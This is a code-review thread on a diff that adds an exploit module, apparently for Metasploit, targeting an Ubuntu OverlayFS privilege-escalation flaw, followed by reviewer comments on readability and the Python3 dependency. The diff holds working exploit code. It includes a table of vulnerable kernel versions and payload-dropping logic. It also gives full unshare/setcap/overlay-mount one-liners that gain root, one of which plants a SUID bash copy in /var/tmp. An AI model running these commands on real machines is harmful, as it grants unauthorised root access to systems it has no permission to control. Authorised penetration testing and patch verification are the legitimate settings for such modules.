modules/exploits/linux/local/game_overlay_privesc.rb

```diff
@@ -0,0 +1,139 @@
+    # Keys are ubuntu versions, vals is list of vunerable kernels
+    {
+      "Lunar Lobster": %w[6.2.0], # Ubuntu 23.04
+      "Kinetic Kudu": %w[5.19.0], # Ubuntu 22.10
+      "Jammy Jellyfish": %w[5.19.0 6.2.0], # Ubuntu 22.04 LTS
+      "Focal Fossa": %w[5.4.0], # Ubuntu 20.04 LTS
+      "Bionic Beaver": %w[5.4.0] # Ubuntu 18.04 LTS
+    }.transform_keys!(&:to_s) # w/o this key will be :"Bionic Beaver"
+  end
+
+  def check
+    fail_with(Failure::NotVulnerable, 'Target is not linux') unless session.platform == 'linux'
+
+    # Must be Ubuntu
+    fail_with(Failure::NotVulnerable, 'Target is not Ubuntu.') unless kernel_version =~ /[uU]buntu/
+
+    os = cmd_exec 'cat /etc/os-release'
+
+    # grab codename i.e. Focal Fossa
+    codename = os.scan(/\(\w* \w*\)/)[0]
+
+    # Remove '(' and ')'
+    codename.delete_prefix!('(').delete_suffix!(')')
+
+    print_status "Detected Ubuntu version: #{codename}"
+
+    # uname -r
+    # yields something like 5.4.0-1018-blah
+    kernel = kernel_release
+    print_status "Detected kernel version: #{kernel}"
+
+    # Make sure release is running vunerable kernel
+    # will this return in correct context??
+    # could scan kernel to prevent looping if return below doesn't work
+    vuln[codename].each do |version|
+      if kernel.include? version
+        return CheckCode::Vulnerable "#{codename} with #{kernel} kernel is vunerable"
+      end
+    end
+  end
+
+  def execute_command(_cmd, _opts = {})
+    pay_file = datastore['PayloadFilename']
+
+    pay_dir = datastore['PayloadDir']
+
+    directories = %w[l u w m].flat_map { |e| "/tmp/main/#{e}" }
+
+    # Should we make sure directory doesn't already exist?
+
+    directories.each do |dir|
+      print_status "Creating directory #{dir}"
+      cmd_exec "mkdir -p #{dir}"
+    end
+
+    register_dir_for_cleanup "/tmp/main/"
+
+    print_status "Creating directory to store payload: #{pay_dir}"
+    pay_dir.concat "/" unless pay_dir.ends_with? "/"
+    cmd_exec "mkdir -p #{pay_dir}"
+
+    register_dir_for_cleanup pay_dir
+
+    pay = "#{pay_dir}#{pay_file}"
+
+    print_status "Writing payload: #{pay}"
+
+    write_file "#{pay}", generate_payload_exe
+    # works move test to low, run unshare mount set cap, shell
+
+    print_status 'Starting new namespace, and running exploit...'
+
+    # g1vi original
+    # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
+    hack = "unshare -rm sh -c \"cp /u*/b*/p*3 /tmp/main/l/; setcap cap_setuid+eip /tmp/main/l/python3; mount -t overlay overlay -o rw,lowerdir=/tmp/main/l,upperdir=/tmp/main/u,workdir=/tmp/main/w /tmp/main/m && touch /tmp/main/m/*\" && /tmp/main/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")' "
```

Comment:
This is a tad unreadable, please use new lines. Also, it seems that Python3 is a hard requirement for this exploit. Either make this explicit in the module requirements, or change it to something more ubiquitous, like a shell script.

Reply:
I'll us a shell instead of python, I want to use `sh` but should I add support for other shells to?

Reply:
`sh` is good enough™ I'd say: if you're running a box without `sh` on it, odds are that you're doing really odd stuff.

Reply:
I'm going to stick with python for the exploit, how should I make sure the user knows that it is required?